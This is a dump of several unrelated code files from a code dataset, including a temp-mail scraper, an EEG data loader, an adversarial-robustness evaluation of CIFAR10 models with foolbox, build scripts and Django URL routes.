hawkEye.main()","sub_path":"periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":19912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521783407","text":"from selenium import webdriver\r\n\r\n\r\n__author__ = \"Gaizka - @ethg1 on GitHub\"\r\n\r\n\r\n\"\"\"\r\nMIT License\r\n\r\nA short and simple permissive license with conditions only requiring preservation of\r\ncopyright and license notices. Licensed works, modifications, and larger works may\r\nbe distributed under different terms and without source code.\r\n\r\nhttps://github.com/ethg1/temp-mail-org-api-ws/blob/master/LICENSE\r\n\r\n\"\"\"\r\n\r\n\r\nclass TempMailAPI_Email:\r\n def __init__(self, from_name, from_email, recv_time, subject, source_html):\r\n self.from_name = from_name\r\n self.from_email = from_email\r\n self.recv_time = recv_time\r\n self.subject = subject\r\n self.source_html = source_html\r\n\r\n\r\nclass TempMailAPI_WebScrap:\r\n def __init__(self):\r\n self.driver = None\r\n\r\n def load(self, firefox_binary_location, geckodriver_location = \"./geckodriver.exe\"):\r\n options = webdriver.FirefoxOptions()\r\n options.headless = True\r\n options.binary = firefox_binary_location\r\n self.driver = webdriver.Firefox(options=options, executable_path=geckodriver_location)\r\n\r\n def get_new_mail_address(self):\r\n self.driver.get('https://temp-mail.org/')\r\n btn = self.driver.find_element_by_id('click-to-delete')\r\n btn.click()\r\n return self.get_current_mail_address()\r\n\r\n def get_current_mail_address(self):\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n mail = self.driver.find_element_by_id('mail')\r\n\r\n return mail.get_attribute('value')\r\n\r\n def get_mail_list(self):\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n dataList = self.driver.find_element_by_class_name('inbox-dataList')\r\n li = dataList.find_elements_by_tag_name('li')[1:]\r\n\r\n mails = []\r\n for m in li:\r\n a = m.find_element_by_tag_name('a')\r\n a.click()\r\n\r\n data = self.driver.find_element_by_class_name('inbox-data-content')\r\n\r\n mail = TempMailAPI_Email(\r\n data.find_element_by_class_name('from-name').text,\r\n data.find_element_by_class_name('from-email').text,\r\n data.find_element_by_class_name('user-data-time-data').text,\r\n data.find_element_by_class_name('user-data-subject').find_element_by_tag_name('h4').text,\r\n data.find_element_by_class_name('inbox-data-content-intro').get_attribute('innerHTML')\r\n )\r\n\r\n mails.append(mail)\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n return mails\r\n\r\n def close(self):\r\n try:\r\n self.driver.close()\r\n self.driver.quit()\r\n except:\r\n pass\r\n","sub_path":"tempmail.py","file_name":"tempmail.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"619682241","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\nfrom datasets import ChannelsVoltageDataset\nfrom mne.datasets import eegbci\nfrom mne.io import concatenate_raws, read_raw_edf\nfrom mne import Epochs, find_events, concatenate_epochs\nimport os\nfrom visualisations import eeg_sample_plot, events_distribution_plot\nimport torch\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n\"\"\"\nThe data are provided here in EDF+ format (containing 64 EEG signals, each sampled at 160 samples per second, and an \nannotation channel).\nThe .event files and the annotation channels in the corresponding .edf files contain identical data.\n\nEach annotation includes one of three codes (T0, T1, or T2):\n\nCoded as label = 1:\n T0 corresponds to rest\n\nCoded as label = 2:\n T1 corresponds to onset of motion (real or imagined of\n the left fist (in runs 3, 4, 7, 8, 11, and 12)\n both fists (in runs 5, 6, 9, 10, 13, and 14)\n\nCoded as label = 3: \n T2 corresponds to onset of motion (real or imagined) of\n the right fist (in runs 3, 4, 7, 8, 11, and 12)\n both feet (in runs 5, 6, 9, 10, 13, and 14)\n\nThe runs correspond to:\nrun \t task\n1 \t Baseline, eyes open\n2 \t Baseline, eyes closed\n3, 7, 11 \t Motor execution: left vs right hand\n4, 8, 12 \t Motor imagery: left vs right hand\n5, 9, 13 \t Motor execution: hands vs feet\n6, 10, 14 \t Motor imagery: hands vs feet\n\nPOSSIBLE LABELS APPEAR IN RUNS ACTUAL LABEL IN RUNS OUR OFFSET NEEDED\n0 Baseline, eyes open 1 T0(=1) 1\n1 Baseline, eyes closed 2 T0(=1) 0\n2 Motor Ex: Left Hand 3,7,11 T1(=2) 0\n3 Motor Ex: Right Hand 3,7,11 T2(=3) 0\n4 Motor Im: Left Hand 4,8,12 T1(=2) -2\n5 Motor Im: Right Hand 4,8,12 T2(=3) -2\n6 Motor Ex: Both Hands 5,9,13 T1(=2) -4\n7 Motor Ex: Both Feet 5,9,13 T2(=3) -4\n8 Motor Im: Both Hands 6,10,14 T1(=2) -6\n9 Motor Im: Both Feet 6,10,14 T2(=3) -6\n\n\"\"\"\n\n\ndef get_dataloader_objects(my_cfg):\n \"\"\"LOAD RAW DATA\"\"\"\n epoched = get_epoched_data(my_cfg)\n\n \"\"\"DATA PREPARATION\"\"\"\n # Convert data from volt to millivolt\n # Pytorch expects float32 for input and int64 for labels.\n event_current_class_column = 2 # event_previous_class_column = 1 event_start_sample_column = 0\n\n data = (epoched.get_data() * 1e6) # Get all epochs as a 3D array.\n data = data[:, :-1, :] # We do not want to feed in the labels as inputs\n \n if my_cfg.removeLastData:\n remaining = data.shape[2] % 10\n data = data[:, :, :-remaining]\n \n if my_cfg.Elec2D:\n data = dataset_1Dto2D(data)\n \n # Normalize data\n if my_cfg.normalize:\n data = normalize(data)\n \n # -offset_to_subtract -> Classes made matching to CX definition\n labels = epoched.events[:, event_current_class_column]\n\n tSample = data.shape[-1]\n \n if my_cfg.wCropped:\n data, labels = WindowCrop(data,labels,my_cfg.wSize)\n tSample = data.shape[-1]\n \n if len(data.shape) == 4:\n input_dimension_ = data.shape[1] * data.shape[2] * data.shape[3]\n else:\n input_dimension_ = data.shape[1] * data.shape[2]\n output_dimension_ = my_cfg.nClasses \n \n \n print(str(tSample),\" time samples and \",str(data.shape[1]),\" EEG channels for one epoch are taken. \",\\\n \"Total epoch number is \",str(data.shape[0]),\" and there are \",str(len(my_cfg.selected_subjects)),\" subjects included.\\n\",\\\n \"There are in total \", str(my_cfg.nClasses),\" classes for classification.\\n\",flush=True)\n \n # Split data in train test and validation set. Stratify makes sure the label distribution is the same\n temp_data, test_data, temp_labels, test_labels = train_test_split(data, labels, test_size=my_cfg.test_split,\n shuffle=True, stratify=labels)\n\n train_data, val_data, train_labels, val_labels = train_test_split(temp_data, temp_labels,\n test_size=my_cfg.validation_split, shuffle=True,\n stratify=temp_labels)\n \n \n # Do data augmentation of training data\n if my_cfg.augment_with_gauss_noise:\n train_data, train_labels = augment_with_gaussian_noise(train_data, train_labels, my_cfg.augment_std_gauss,\n my_cfg.augmentation_factor)\n # Drop tiles randomly\n if my_cfg.dropOut:\n train_data = dropout_tiles(train_data,my_cfg) \n \n # Convert them to Tensors already. torch.float is needed for GPU.\n train_data = torch.tensor(train_data, dtype=torch.float)\n train_labels = torch.tensor(train_labels, dtype=torch.long)\n val_data = torch.tensor(val_data, dtype=torch.float)\n val_labels = torch.tensor(val_labels, dtype=torch.long)\n test_data = torch.tensor(test_data, dtype=torch.float)\n test_labels = torch.tensor(test_labels, dtype=torch.long)\n\n myTransforms = None # TODO: This has to be more sophisticated. Should also be list selectable like the optimizers\n\n\n # Define datasets\n train_ds = ChannelsVoltageDataset(train_data, train_labels,\n my_cfg.normalize) # TODO: Should also be list selectable like the optimizers\n val_ds = ChannelsVoltageDataset(val_data, val_labels, my_cfg.normalize)\n test_ds = ChannelsVoltageDataset(test_data, test_labels, my_cfg.normalize)\n\n # Define data loader\n train_dl = DataLoader(train_ds, my_cfg.batch_size, shuffle=True)\n val_dl = DataLoader(val_ds, my_cfg.batch_size, shuffle=False)\n test_dl = DataLoader(test_ds, my_cfg.batch_size, shuffle=False)\n \n\n return train_dl, val_dl, test_dl, input_dimension_, output_dimension_\n\n\ndef normalize(data):\n print(\"Normalizing data...\",flush=True)\n \n #mean = np.mean(data,axis=(1,2)).reshape(-1,1,1)\n #std = np.std(data,axis=(1,2)).reshape(-1,1,1)\n #data = np.divide( data - np.tile(mean,(data.shape[1],data.shape[2])) , np.tile(std,(data.shape[1],data.shape[2])) )\n \n for i in range(data.shape[0]):\n data[i,:,:] = ( data[i,:,:] - np.mean(data[i,:,:]) ) / np.std( data[i,:,:] )\n data[i,:,:] = (data[i,:,:]+1)*0.5\n \n print(\"...data was normalized.\\n\",flush=True)\n return data\n \ndef dropout_tiles(data,config):\n \n perc = config.dropOutTilePerc\n \n sTimeTile = config.dropOutTimeTile\n sChannelTile = config.dropOutChannelTile\n \n nEpochs = data.shape[0]\n nChannel = data.shape[1]\n nTime = data.shape[2]\n \n if config.dropOutChOnly == True:\n sTimeTile = nTime\n \n if config.dropOutTimeOnly == True:\n sChannelTile = nChannel\n \n nTimeTile = int(np.ceil(nTime/sTimeTile))\n nChannelTile = int(np.ceil(nChannel/sChannelTile))\n \n print(\"Data is being dropped with \", str(perc), \"prob and \", str(sTimeTile), \" sized time tiles(\",\\\n str(nTimeTile),\") and \", str(sChannelTile),\" sized channel tiles(\",str(nChannelTile),\").\", flush=True)\n \n drop = np.random.choice([0, 1], (nEpochs,nChannelTile,nTimeTile), p=[perc,(1-perc)])\n \n drop_mean = np.mean(np.mean(drop,axis=2),axis=1)\n zero_index = np.where(drop_mean == 0)\n\n for idx in zero_index[0]:\n if nTimeTile*nChannelTile > 1:\n fill_i = np.random.randint(0, nTimeTile*nChannelTile-1)\n else:\n fill_i = int(0)\n fill_ch = int(fill_i / nTimeTile)\n fill_time = int(fill_i % nTimeTile)\n drop[idx,fill_ch,fill_time] = 1\n \n drop = np.repeat(drop, sTimeTile, axis=2)\n drop = np.repeat(drop, sChannelTile, axis=1)\n \n drop = drop[:,:data.shape[1],:data.shape[2]]\n data = np.multiply(data,drop)\n \n print(\"...data was being dropped.\", flush=True)\n return data\n \n\ndef augment_with_gaussian_noise(data, labels, std, multiplier):\n \n print(\"Data is being augmented with gaussian noise...\",flush=True)\n mean = 0\n augmented_data = []\n augmented_labels = []\n if std > 1:\n raise ValueError(' We expect in the range 0 to 1')\n\n for idx, tmp_data in tqdm(enumerate(data),total=len(data)):\n if idx % 100 == 0:\n pass\n #print('Augmented ', idx, 'of', len(data))\n for j in range(multiplier):\n tmp_label = labels[idx]\n if j == 0: # Take the real data for once\n augmented_data.append(tmp_data)\n augmented_labels.append(tmp_label)\n else:\n tmp_std_data = np.std(tmp_data)\n tmp_std = tmp_std_data*std\n\n noise = np.random.normal(loc=mean, scale=tmp_std, size=np.shape(tmp_data))\n tmp_data_noisy = np.add(tmp_data, noise)\n augmented_data.append(tmp_data_noisy)\n augmented_labels.append(tmp_label)\n augmented_data = np.asarray(augmented_data, dtype=np.float64)\n augmented_labels = np.asarray(augmented_labels, dtype=np.int32)\n print(\"...augmentation with gaussian noise is finished. \\n\",flush=True)\n\n return augmented_data, augmented_labels\n\ndef get_epoched_data(my_cfg):\n # Experimental runs per subject (range from 1 to 14). Runs differ in tasks performed tasks!\n # -> We want to split up the dataset in all classes there are\n\n #arr_runs = np.array([1, 2, [3, 7, 11], [4, 8, 12], [5, 9, 13], [6, 10, 14]])\n #arr_selected_classes = np.array([1, 1, [2, 3], [2, 3], [2, 3], [2, 3], [2, 3]])\n #arr_labels_offsets = np.array([1, 0, 0, -2, -4, -6])\n \n #***** 8 CLASSES ( WITHOUT BASELINE ) ***************\n arr_runs = np.array([[3, 7, 11], [4, 8, 12], [5, 9, 13], [6, 10, 14]])\n arr_selected_classes = np.array([[2, 3], [2, 3], [2, 3], [2, 3], [2, 3]])\n arr_labels_offsets = np.array([-2, 0, 2, -4]) \n \n #***** 4 CLASSES ***************\n #arr_runs = np.array([ [4, 8, 12], [6, 10, 14]])\n #arr_runs = np.array([ [3, 7, 11], [5, 9, 13] ])\n #arr_selected_classes = np.array([[2, 3], [2, 3]])\n #arr_labels_offsets = np.array([0, 2]) \n \n #***** 2 CLASSES ***************\n #arr_runs = np.array([ [3, 7, 11]])\n #arr_selected_classes = np.array([[2, 3]])\n #arr_labels_offsets = np.array([2]) \n\n # Load the data\n subjects = my_cfg.selected_subjects\n current_path = os.path.abspath(__file__)\n # print(current_path)\n if 'studi7/home/ProjectCode/' in current_path:\n data_path = '../../var/tmp/RawDataMNE'\n print('We are on the cluster...\\n',flush=True)\n data_path = '../../var/tmp/RawDataMNE'\n else:\n print('We are not on the cluster...\\n',flush=True)\n data_path = 'RawDataMNE'\n\n \n print(\"Data is being loaded using MNE...\",flush=True)\n\n list_epochs = []\n for idx, runs in tqdm(enumerate(arr_runs),total=len(arr_runs)):\n tmp_classes = arr_selected_classes[idx]\n tmp_offset = arr_labels_offsets[idx]\n raw_EDF_list = []\n\n for subj in subjects:\n fileNames = eegbci.load_data(subj, runs, path=data_path)\n raw_EDF = [read_raw_edf(f, preload=True, stim_channel='auto', verbose='WARNING') for f in fileNames]\n raw_EDF_list.append(concatenate_raws(raw_EDF))\n\n raw = concatenate_raws(raw_EDF_list)\n\n # Pick the events\n events = find_events(raw, shortest_event=0, verbose=my_cfg.verbose)\n # Subtract the offset to make the label match\n events[:, 2] = events[:, 2] - tmp_offset\n tmp_classes = (tmp_classes - tmp_offset).tolist()\n # Extract the epochs\n tmp_epoched = Epochs(raw, events, event_id=tmp_classes, tmin=my_cfg.time_before_event_s,\n tmax=my_cfg.time_after_event_s, baseline=None, picks=None,\n preload=False, reject=None, flat=None, proj=True, decim=my_cfg.downSample, reject_tmin=None, reject_tmax=None,\n detrend=None, on_missing='error', reject_by_annotation=True, metadata=None,\n verbose=my_cfg.verbose)\n\n # Store epoch for later use\n list_epochs.append(tmp_epoched)\n 'DEBUG'\n \"\"\"SHOW DATA\"\"\"\n # Show some sample EEG data if desired\n if my_cfg.show_eeg_sample_plot:\n eeg_sample_plot(my_cfg.subjectIdx_to_plot, my_cfg.seconds_to_plot, my_cfg.channels_to_plot, raw_EDF_list)\n if my_cfg.show_events_distribution:\n events_distribution_plot(tmp_epoched.events)\n\n epoched = concatenate_epochs(list_epochs)\n\n\n \"\"\"SHOW DATA\"\"\"\n # Show some sample EEG data if desired\n if my_cfg.show_eeg_sample_plot:\n eeg_sample_plot(my_cfg.subjectIdx_to_plot, my_cfg.seconds_to_plot, my_cfg.channels_to_plot, raw_EDF_list)\n if my_cfg.show_events_distribution:\n events_distribution_plot(epoched.events)\n\n print(\"...data loading with MNE was finished. \\n\")\n\n return epoched\n\n\n\n\n'''\n# https://github.com/dalinzhang/Cascade-Parallel/blob/master/data_preprocess/pre_process.py\n\n\tdata_2D[0] = [ \t \t 0, \t 0, \t \t 0, \t 0, data[21], data[22], data[23], \t 0, \t 0, \t 0, \t \t 0]\n\tdata_2D[1] = [\t \t 0, \t 0, \t \t 0, data[24], data[25], data[26], data[27], data[28], \t \t 0, \t 0, \t \t 0]\n\tdata_2D[2] = [\t \t 0, data[29], data[30], data[31], data[32], data[33], data[34], data[35], data[36], data[37], \t \t 0]\n\tdata_2D[3] = [\t \t 0, data[38], data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[39], \t\t 0]\n\tdata_2D[4] = [data[42], data[40], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[41], data[43]]\n\tdata_2D[5] = [\t \t 0, data[44], data[14], data[15], data[16], data[17], data[18], data[19], data[20], data[45], \t\t 0]\n\tdata_2D[6] = [\t \t 0, data[46], data[47], data[48], data[49], data[50], data[51], data[52], data[53], data[54], \t\t 0]\n\tdata_2D[7] = [\t \t 0, \t 0, \t \t 0, data[55], data[56], data[57], data[58], data[59], \t \t 0, \t 0, \t\t 0]\n\tdata_2D[8] = [\t \t 0, \t 0, \t \t 0, \t 0, data[60], data[61], data[62], \t 0, \t \t 0, \t 0, \t\t 0]\n\tdata_2D[9] = [\t \t 0, \t 0, \t \t 0, \t 0, \t 0, data[63], \t\t 0, \t 0, \t \t 0, \t 0, \t\t 0]\n\n'''\ndef data_1Dto2D(data, Y=10, X=11):\n \n data_2D = np.zeros([1, Y, X, data.shape[1] ])\n\n data_2D[0,0,4:7,:] = data[21:24,:]\n\n data_2D[0,1,3:8,:] = data[24:29,:]\n \n data_2D[0,2,1:10,:] = data[29:38,:]\n\n data_2D[0,3,1,:] = data[39,:]\n data_2D[0,3,2:9,:] = data[0:7,:]\n data_2D[0,3,9,:] = data[39,:]\n \n data_2D[0,4,0,:] = data[42,:]\n data_2D[0,4,1,:] = data[40,:]\n data_2D[0,4,2:9,:] = data[7:14,:]\n data_2D[0,4,9,:] = data[41,:]\n data_2D[0,4,10,:] = data[43,:]\n \n data_2D[0,5,1,:] = data[44,:]\n data_2D[0,5,2:9,:] = data[14:21,:]\n data_2D[0,5,9,:] = data[45,:]\n \n data_2D[0,6,1:10,:] = data[46:55,:]\n\n data_2D[0,7,3:8,:] = data[55:60,:]\n \n data_2D[0,8,4:7,:] = data[60:63,:]\n \n data_2D[0,8,5,:] = data[63,:]\n \n return data_2D\n\n\ndef dataset_1Dto2D(dataset_1D):\n print('Dataset is being made 2D...',flush=True)\n dataset_2D = np.zeros([dataset_1D.shape[0],10,11,dataset_1D.shape[2]])\n for i in range(dataset_1D.shape[0]):\n dataset_2D[i,:,:,:] = data_1Dto2D(dataset_1D[i,:,:])\n print(\"Data is now 2D.\\n\",flush=True)\n return dataset_2D\n\n\ndef WindowCrop(data, labels, window_size):\n \n print(\"Dataset is being cropped in time axis...\",flush=True)\n \n tPoints = data.shape[-1]\n nWindows = int (np.floor( tPoints/window_size ) ) * 2 - 1 \n \n if len(data.shape) == 4:\n cData = np.zeros([data.shape[0],data.shape[1],data.shape[2],nWindows,window_size])\n for i in range(nWindows):\n cData[:,:,:,i,:] = data[:,:,:,i*int(window_size/2):i*int(window_size/2)+window_size]\n cData = np.moveaxis(cData, -2, 1)\n cData = np.reshape(cData,(-1,cData.shape[2],cData.shape[3],cData.shape[4]))\n else:\n cData = np.zeros([data.shape[0],data.shape[1],nWindows,window_size])\n for i in range(nWindows):\n cData[:,:,i,:] = data[:,:,i*int(window_size/2):i*int(window_size/2)+window_size]\n cData = np.moveaxis(cData, -2, 1)\n cData = np.reshape(cData,(-1,cData.shape[2],cData.shape[3]))\n \n \n labels = np.repeat(labels,nWindows,axis=0)\n \n print(\"Dataset is cropped. From shape\",data.shape,\"to\",cData.shape,\"\\n\",flush=True)\n \n return cData, labels\n \n \n \n","sub_path":"ProjectCode/data_loader_creation.py","file_name":"data_loader_creation.py","file_ext":"py","file_size_in_byte":16893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96429430","text":"import os\nimport threading\n\nsearch_orders = ['RDUL', 'RDLU', 'DRUL', 'DRLU', 'LUDR', 'LURD', 'ULDR', 'ULRD']\ndistance_zeroMovement = {1: 2, 2: 4, 3: 10, 4: 24, 5: 54, 6: 107, 7: 212}\n\nrun = \"Main.py\"\n\n\ndef int_to_fancy_string(number):\n number_as_string = str(number)\n digits_number = len(number_as_string)\n difference = 5 - digits_number\n return \"0\" * difference + number_as_string\n\n\ndef worker_strategic(strategy):\n for distance in range(1, 8):\n for zero_pozition in range(1, distance_zeroMovement[distance] + 1):\n file_prefix = \"4x4_0{d}_{z}\".format(d=distance, z=int_to_fancy_string(zero_pozition))\n input_file = \"{p}.txt\".format(p=file_prefix)\n for order in search_orders:\n solution_file = \"{p}_{s}_{o}_sol.txt\".format(p=file_prefix, s=strategy, o=order)\n info_file = \"{p}_{s}_{o}_stats.txt\".format(p=file_prefix, s=strategy, o=order)\n command = \"python {r} {s} {o} {i} {sol} {info}\".format(r=run, s=strategy, o=order, i=input_file, sol=solution_file, info=info_file)\n os.system(command)\n\n\ndef worker_astr(heur):\n for distance in range(1, 8):\n for zero_pozition in range(1, distance_zeroMovement[distance] + 1):\n file_prefix = \"4x4_0{d}_{z}\".format(d=distance, z=int_to_fancy_string(zero_pozition))\n input_file = \"{p}.txt\".format(p=file_prefix)\n solution_file = \"{p}_astr_{h}_sol.txt\".format(p=file_prefix, h=heur)\n info_file = \"{p}_astr_{h}_stats.txt\".format(p=file_prefix, h=heur)\n command = \"python {r} astr {h} {i} {sol} {info}\".format(r=run, h=heur, i=input_file, sol=solution_file, info=info_file)\n os.system(command)\n\n\nclass MyThread (threading.Thread):\n def __init__(self, func, name):\n threading.Thread.__init__(self)\n self.func = func\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n self.func(self.name)\n print(\"Exiting \" + self.name)\n\n\ndef main():\n # Create new threads\n thread1 = MyThread(worker_strategic, 'bfs')\n thread2 = MyThread(worker_strategic, 'dfs')\n thread3 = MyThread(worker_astr, 'hamm')\n thread4 = MyThread(worker_astr, 'manh')\n\n # Start new Threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n thread1.join()\n thread2.join()\n thread3.join()\n thread4.join()\n print(\"Exiting Main Thread\")\n\n\nif __name__ == '__main__':\n main()","sub_path":"zad1/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576152798","text":"from knock72 import pn_list\nfrom knock76 import pl_list\n#from sklearn.metrics import confusion_matrix\n\ndef confmat_status(true_list,pre_list):\n tp = 0\n tn = 0\n fp = 0\n fn = 0\n for i in range(len(true_list)):\n if true_list[i] == pre_list[i]:\n if true_list[i] == 1:\n tp += 1\n else:\n tn += 1\n else:\n if true_list[i] == 1:\n fn += 1\n else:\n fp += 1\n# return [tp,tn,fp,fn]\n\n acc = (tp + tn) / (tp + tn + fp + fn) # 正解率\n pre = tp / (tp + fp) # 適合率\n rec = tp / (tp + fn) # 再現率\n f1 = 2 * pre * rec / (pre + rec)\n return [acc,pre,rec,f1]\n\nif __name__ == '__main__':\n result = confmat_status(pn_list,pl_list)\n print('正解率:{}\\n適合率:{}\\n再現率:{}\\nf1_score:{}'.format(result[0],result[1],result[2],result[3]))\n\n\n# print(tp)\n# print(tn)\n# print(fp)\n# print(fn)\n# print(tp+tn+fn+fp)\n","sub_path":"yohta/chapter08/knock77.py","file_name":"knock77.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263711136","text":"from typing import TYPE_CHECKING, Tuple, Type\nfrom weakref import proxy\n\nfrom ormar.fields import BaseField\nfrom ormar.fields.many_to_many import ManyToManyField\n\nif TYPE_CHECKING: # pragma no cover\n from ormar import Model\n\n\ndef get_relations_sides_and_names(\n to_field: Type[BaseField],\n parent: \"Model\",\n child: \"Model\",\n child_name: str,\n virtual: bool,\n) -> Tuple[\"Model\", \"Model\", str, str]:\n to_name = to_field.name\n if issubclass(to_field, ManyToManyField):\n child_name, to_name = (\n to_field.related_name\n or child.resolve_relation_name(\n parent, to_field.through, explicit_multi=True\n ),\n to_name,\n )\n child = proxy(child)\n elif virtual:\n child_name, to_name = to_name, child_name or child.get_name()\n child, parent = parent, proxy(child)\n else:\n child_name = child_name or child.get_name() + \"s\"\n child = proxy(child)\n return parent, child, child_name, to_name\n","sub_path":"ormar/relations/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"447554697","text":"# !pip install foolbox\nimport torch\nimport eagerpy as ep\nfrom foolbox import PyTorchModel, accuracy, samples\nimport foolbox.attacks as fa\nimport numpy as np\nimport json\n\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\n\ntorch.hub.set_dir('/data/torchhub/')\n\ntest_transform = transforms.Compose([\n transforms.ToTensor() # convert to tensor\n])\n\n# load data\ntestset = CIFAR10(\".\", train=False, download=True, transform=test_transform)\ntestloader = DataLoader(testset, batch_size=1000, shuffle=False)\n\nbottlenecks = [1,2,4,8,16,32]\nruns = range(0,10)\nventraldepths = [0,1,2,3,4]\n\nattacks = [\n fa.FGSM(),\n fa.LinfPGD(),\n fa.LinfBasicIterativeAttack(),\n fa.LinfAdditiveUniformNoiseAttack(),\n fa.LinfDeepFoolAttack(),\n]\n\nepsilons = [\n 0.0,\n 0.0005,\n 0.001,\n 0.0015,\n 0.002,\n 0.003,\n 0.005,\n 0.01,\n 0.02,\n 0.03,\n 0.1,\n 0.3,\n 0.5,\n 1.0,\n]\n\nresults = dict()\n\nfor vdepth in ventraldepths:\n results[vdepth] = dict()\n for bn in bottlenecks:\n results[vdepth][bn] = dict()\n for run in runs:\n print(vdepth, bn, run)\n \n results[vdepth][bn][run] = dict()\n \n model = torch.hub.load('ecs-vlc/opponency:master', 'colour_full', n_bn=bn, d_vvs=vdepth, rep=run)\n model.eval()\n fmodel = PyTorchModel(model, bounds=(0, 1))\n\n # images, labels = samples(fmodel, dataset=\"cifar10\", batchsize=20)\n # images = images.contiguous()\n\n\n # results[vdepth][bn][run][\"accuracy\"] = accuracy(fmodel, images, labels)\n\n attack_success = np.zeros((len(attacks), len(epsilons), len(testset)), dtype=np.bool)\n for i, attack in enumerate(attacks):\n print(attack)\n idx=0\n for images, labels in testloader:\n print('.', end='')\n images = images.to(fmodel.device)\n labels = labels.to(fmodel.device)\n\n _, _, success = attack(fmodel, images, labels, epsilons=epsilons)\n success_ = success.cpu().numpy()\n attack_success[i][:,idx:idx+len(labels)] = success_\n idx = idx + len(labels)\n print(\"\")\n for i, attack in enumerate(attacks):\n results[vdepth][bn][run][str(attack)] = (1.0 - attack_success[i].mean(axis=-1)).tolist()\n\n robust_accuracy = 1.0 - attack_success.max(axis=0).mean(axis=-1)\n results[vdepth][bn][run]['robust_accuracy'] = robust_accuracy.tolist()\n\n with open('adv-results-cifar-linf.json', 'w') as fp:\n json.dump(results, fp)\n","sub_path":"CifarAdverserial_Linf.py","file_name":"CifarAdverserial_Linf.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157607578","text":"#\n# SConscript for common-v4.5\n# Created: Aug 16, 2006 - Jdw\n# Updated: Aug 23, 2006 - Jdw\n# Add object install\n# Mar 30, 2011 jdw clone environment\nImport('env')\nenv=env.Clone()\n#\nif (len(env.subst('$MYDEBUG')) > 0):\n\tdict = env.Dictionary()\n\tfor k,v in dict.items():\n \t print(\"%s = %s\" % (k, str(v)))\n#\nlibName = 'common'\nlibSrcList =['src/RcsbPlatform.C',\n\t 'src/RcsbFile.C',\n\t 'src/BlockIO.C',\n\t 'src/CifString.C',\n\t 'src/Serializer.C',\n\t 'src/GenString.C',\n\t 'src/GenCont.C',\n\t 'src/Exceptions.C',\n\t 'src/DataInfo.C',\n \t 'src/mapped_vector.C',\n \t 'src/mapped_ptr_vector.C']\nlibObjList = [s.replace('.C','.o') for s in libSrcList]\n#\nlibIncList =['include/RcsbPlatform.h',\n\t 'include/RcsbFile.h',\n\t 'include/BlockIO.h',\n\t 'include/CifString.h',\n\t 'include/Serializer.h',\n\t 'include/rcsb_types.h',\n\t 'include/GenString.h',\n\t 'include/GenCont.h',\n\t 'include/Exceptions.h',\n\t 'include/DataInfo.h',\n \t 'include/mapped_vector.h',\n \t 'include/mapped_ptr_vector.h',\n \t 'src/mapped_vector.C',\n \t 'src/mapped_ptr_vector.C']\n#\nmyLib=env.Library(libName,libSrcList)\n#\n#\nenv.Install(env.subst('$MY_LIB_INSTALL_PATH'),myLib)\nenv.Alias('install-lib',env.subst('$MY_LIB_INSTALL_PATH'))\n#\nenv.Install(env.subst('$MY_INCLUDE_INSTALL_PATH'),libIncList)\nenv.Alias('install-include',env.subst('$MY_INCLUDE_INSTALL_PATH'))\n#\nenv.Default('install-lib','install-include')\n#\nenv.Install(env.subst('$MY_OBJ_INSTALL_PATH'),libObjList)\nenv.Alias('install-obj',env.subst('$MY_OBJ_INSTALL_PATH'))\n#\nenv.Default('install-lib','install-include','install-obj')\n#\n","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452557964","text":"from django.urls import path\nfrom manager import views\n\n\nurlpatterns = [\n path('', views.collections, name='home'),\n path('collections/add/', views.collections_add),\n path('collections/edit//', views.items, name='display_collection'),\n path('collections/edit//save/', views.collections_edit),\n path('collections/delete//', views.collections_delete),\n path('collections//items/add/', views.items_add),\n path('collections/items//', views.items_value, name='display_value'),\n path('collections/items//delete/', views.items_delete),\n path('collections/items//value/add/', views.items_value_add),\n path('collections/items/value//delete/', views.items_value_del),\n path('collections/items//field//generate/', views.items_value_generate),\n path('collections//generate/', views.collection_items_generate_selection),\n path('collections//generate/do/', views.collection_items_generate),\n path('collections//generate/fix/', views.collection_fix),\n path('collections//generate/do/fix/', views.collection_items_generate_fix),\n path('collections/duplicate//', views.collection_duplicate),\n\n path('types/', views.types, name='types'),\n path('types/add/', views.types_add),\n path('types/edit//', views.types_detail, name='types_detail'),\n path('types/edit//save/', views.types_edit),\n path('types/delete//', views.types_delete),\n path('types/option//add/', views.option_add),\n path('types/option//delete/', views.option_remove),\n path('types/subtype/add/', views.subtype_add),\n path('types/subtype/edit//', views.subtype_detail, name='subtype_detail'),\n path('types/subtype/edit//save/', views.subtype_edit),\n path('types/subtype/delete//', views.subtypes_delete),\n path('types/duplicate//', views.types_duplicate),\n\n path('exports/', views.exports, name='index_export'),\n path('exports/add/', views.exports_add),\n path('exports/delete//', views.exports_del),\n path('exports/duplicate//', views.export_duplicate),\n path('exports/edit//', views.exports_view, name='display_export'),\n 